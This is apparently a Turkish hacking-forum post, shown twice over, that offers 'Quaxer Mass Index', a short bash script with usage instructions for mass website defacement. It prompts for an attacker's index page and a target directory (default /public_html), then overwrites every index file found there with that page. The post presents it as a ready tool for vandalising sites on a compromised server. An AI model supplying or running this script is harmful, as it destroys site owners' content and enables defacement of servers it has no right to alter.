Quaxer Mass İndex BASH

Kullanımı: dosyaismi.sh şeklinde kaydediniz. Sonra ./dosyaismi.sh şeklinde çalıştırabiirsiniz. *** Hidden text: You do not have sufficient rights to view the hidden text...

Kullanımı: dosyaismi.sh şeklinde kaydediniz. Sonra ./dosyaismi.sh şeklinde çalıştırabiirsiniz.
View hidden content is available for registered users!


#!/bin/bash
echo '[+] Indexiniz oldugu dizin (/dizini/index.html)'
read index
echo
echo '[+] Hedef Deface için dizin giriniz ( Default /public_html) '
read path
echo
echo '[+] Indexlenıyor [By QUAXER] ........'
find $path -name "index.*" -exec cp $index {} \;
echo
echo '[+] Done !'

 
Kullanımı: dosyaismi.sh şeklinde kaydediniz. Sonra ./dosyaismi.sh şeklinde çalıştırabiirsiniz.
View hidden content is available for registered users!


#!/bin/bash
echo '[+] Indexiniz oldugu dizin (/dizini/index.html)'
read index
echo
echo '[+] Hedef Deface için dizin giriniz ( Default /public_html) '
read path
echo
echo '[+] Indexlenıyor [By QUAXER] ........'
find $path -name "index.*" -exec cp $index {} \;
echo
echo '[+] Done !'

 
131,905Konular
3,272,477Mesajlar
316,505Kullanıcılar
betone1903Son Üye
Üst Alt